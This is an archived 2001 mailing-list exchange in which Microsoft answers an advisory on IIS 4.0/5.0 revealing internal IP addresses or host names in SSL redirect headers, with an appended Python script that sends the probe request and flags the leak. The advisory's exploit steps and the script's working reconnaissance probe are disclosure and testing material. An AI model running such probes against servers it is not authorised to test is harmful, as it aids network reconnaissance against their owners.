RE: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0

From: Microsoft Security Response Center (secureat_private)
Date: Thu Aug 09 2001 - 10:24:52 PDT


    The checklists for securing IIS4 and IIS5 discuss this issue.
    Specifically:
    
    "Disable IP Address in Content-Location 
    The Content-Location header may expose internal IP addresses that are
    usually hidden or masked behind a Network Address Translation (NAT)
    Firewall or proxy server. Refer to Q218180 for further information about
    disabling this option."
    
    The referenced Knowledge Base Article contains information on how to
    force IIS to use the FQDN instead of the IP address.  
    
    (Q218180) Internet Information Server Returns IP Address in HTTP Header
    (Content-Location) -
    http://support.microsoft.com/directory/article.asp?id=KB;EN-US;Q218180
    "There is a value that can be modified in the IIS metabase to change the
    default behavior from exposing IP addresses to send the FQDN instead.
    This allows the IP address to be masked by the domain name."
    
    
    The IIS4 checklist is available here:
    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/iischk.asp
    
    And the IIS5 checklist here:
    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/iis5chk.asp
    
    Regards,
    
    Secureat_private
    
    -----Original Message-----
    From: Marek Roy [mailto:marek_royat_private] 
    Sent: Tuesday, August 07, 2001 9:55 PM
    To: bugtraqat_private
    Subject: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0
    
    
    GGS-AU / e-Synergies Security Advisory
    
    August 8, 2001
    
    Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0
    
    Synopsis:
    
    e-Synergies has discovered and researched a remote vulnerability in
    Internet Information Server from Microsoft. Successful exploitation of
    this vulnerability can reveal critical internal information such as the
    internal IP address or internal host name.
    
    Affected Versions:
    
    Microsoft IIS 4.0 running SSL
    Microsoft IIS 5.0 running SSL
    
    Description:
    
    By connecting manually to port TCP/443 (SSL) using Perl (SSLeay) or any
    other tool, a remote user has the ability to retrieve the internal IP
    address or reveal the machine's network node hostname.
    
    Exploit:
    
    1-      Browse the web site using a normal SSL browser and find any
            directory, e.g.: https://www.target.com/images/icon.gif
    
    2-      Using a compatible SSL Perl script, execute the following
            command once connected to port 443 of www.target.com:
    
            GET /images HTTP/1.0
    
    3-      The result should look like this:
    
            HTTP/1.1 302 Object Moved
            Location: https://192.168.1.10/images/
            Server: Microsoft-IIS/4.0
            Content-Type: text/html
            Content-Length: xxx
    
            or
    
            HTTP/1.1 302 Object Moved
            Location: https://netbiosname/images/
            Server: Microsoft-IIS/4.0
            Content-Type: text/html
            Content-Length: xxx
    
    Remarks:
    
    Using HTTP/1.1 instead of HTTP/1.0 will not give the same result.
    
    Credits:
    
    Marek Roy
    Senior IT Security Consultant
    
    Please send suggestions, updates, and comments to:
    
    GGS-AU / e-synergies, Sydney, Australia
    Level 9
    65 York Street
    Sydney NSW 2001
    Australia
    
    Phone: +61 2 9279 2533
    Fax: +61 2 9279 2544
    Email: enquiries@ggs-au.com
    http://www.ggs-au.com
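The probe and the check described in the advisory above, written out as an added example (this is editor-supplied code, not the advisory's Perl/SSLeay script and not anything from Microsoft). It sends the same `GET /images HTTP/1.0` request over TLS, with no Host header, then classifies the host in the 302 `Location` (and, for the MSRC reply's point, `Content-Location`) header as an RFC 1918 address, a bare single-label name, a public address, or an FQDN. The three sample responses are constructed to mirror the advisory's output; `www.target.com`, `192.168.1.10` and `WEBSRV01` are placeholders, and `probe()` is only exercised when you give it a real host.

```python
"""Check an HTTPS server for the IIS redirect address leak described in the advisory.

Added example; not code from the advisory or from Microsoft.
"""
import ipaddress
import socket
import ssl
from urllib.parse import urlsplit

# RFC 1918 and link-local ranges: a redirect to one of these leaks the
# address the server has behind its NAT device or reverse proxy.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16")]

# Constructed sample responses modelled on the advisory's output (not real captures).
LEAKY_IP = (b"HTTP/1.1 302 Object Moved\r\n"
            b"Location: https://192.168.1.10/images/\r\n"
            b"Server: Microsoft-IIS/4.0\r\n"
            b"Content-Type: text/html\r\n"
            b"Content-Length: 0\r\n\r\n")
LEAKY_NAME = (b"HTTP/1.1 302 Object Moved\r\n"
              b"Location: https://WEBSRV01/images/\r\n"   # hypothetical NetBIOS name
              b"Server: Microsoft-IIS/4.0\r\n"
              b"Content-Type: text/html\r\n"
              b"Content-Length: 0\r\n\r\n")
HARDENED = (b"HTTP/1.1 302 Object Moved\r\n"
            b"Location: https://www.target.com/images/\r\n"   # FQDN, what the KB fix produces
            b"Server: Microsoft-IIS/4.0\r\n"
            b"Content-Type: text/html\r\n"
            b"Content-Length: 0\r\n\r\n")


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status line, {lower-cased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def classify_host(host: str) -> str:
    """Classify the host part of a redirect target.

    'private-ip'    RFC 1918 / link-local address  (internal address leak)
    'public-ip'     routable address               (an IP, but not internal)
    'bare-hostname' single label such as a NetBIOS name (internal name leak)
    'fqdn'          dotted name, the behaviour the KB article configures
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "fqdn" if "." in host else "bare-hostname"
    return "private-ip" if any(ip in net for net in PRIVATE_NETS) else "public-ip"


def analyze(raw: bytes) -> dict:
    """Flag a response whose Location or Content-Location points at internal data."""
    status, headers = parse_response(raw)
    findings = {}
    for hdr in ("location", "content-location"):
        if hdr in headers:
            host = urlsplit(headers[hdr]).hostname
            if host:
                findings[hdr] = classify_host(host)
    leak = any(v in ("private-ip", "bare-hostname") for v in findings.values())
    return {"status": status, "leak": leak, "findings": findings}


def probe(host: str, path: str = "/images", port: int = 443, timeout: float = 5.0) -> dict:
    """Send the advisory's HTTP/1.0 request (deliberately no Host header) and analyze the reply."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # reconnaissance against an untrusted server:
    ctx.verify_mode = ssl.CERT_NONE     # we only care about the headers it sends back
    try:
        ctx.minimum_version = ssl.TLSVersion.TLSv1   # IIS 4/5-era servers speak only old TLS
    except (ValueError, ssl.SSLError):
        pass                                         # build may not allow it; try anyway
    request = f"GET {path} HTTP/1.0\r\n\r\n".encode()
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(request)
            while True:
                data = tls.recv(4096)
                if not data:            # HTTP/1.0: server closes after the response
                    break
                chunks.append(data)
    return analyze(b"".join(chunks))


if __name__ == "__main__":
    for label, sample in (("ip", LEAKY_IP), ("name", LEAKY_NAME), ("fqdn", HARDENED)):
        print(label, analyze(sample))
```

The request path is a directory without the trailing slash, which is what makes IIS answer with a 302 to the canonical URL; omitting the Host header (which HTTP/1.0 allows and HTTP/1.1 does not) is what leaves the server to fill in the hostname itself. After applying the metabase change from Q218180, `probe()` should report `fqdn` for the `location` finding and `leak` should be `False`.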
    



    This archive was generated by hypermail 2b30 : Thu Aug 09 2001 - 16:37:29 PDT